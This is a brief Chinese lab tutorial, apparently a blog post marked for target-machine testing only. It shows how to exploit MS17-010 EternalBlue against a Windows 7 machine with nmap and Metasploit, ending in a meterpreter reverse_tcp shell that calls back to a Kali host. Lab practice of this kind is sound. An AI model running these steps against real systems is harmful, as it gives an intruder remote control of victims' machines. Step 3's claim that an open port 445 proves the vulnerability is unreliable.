免责声明:只用于靶机测试
1.渗透之前要关闭windones7和主机的防火墙及杀毒软件。
2.使用nmap扫描windones7
3.445端口开放,说明有ms17-010的漏洞。
4.使用命令msfconsole
打开msf
5.使用search ms17-010
命令查找攻击模块
6.使用exploit/windows/smb/ms17_010_eternalblue
模块攻击
use选择
7.show options 配置参数为yes的都要设置。
8..set rhosts [windones7ip]
set lhosts kaliip
9.设置tcp连接set payload windows/x64/meterpreter/reverse_tcp
10,run攻击
建立连接。
提权和文件上传会在下一篇博客中。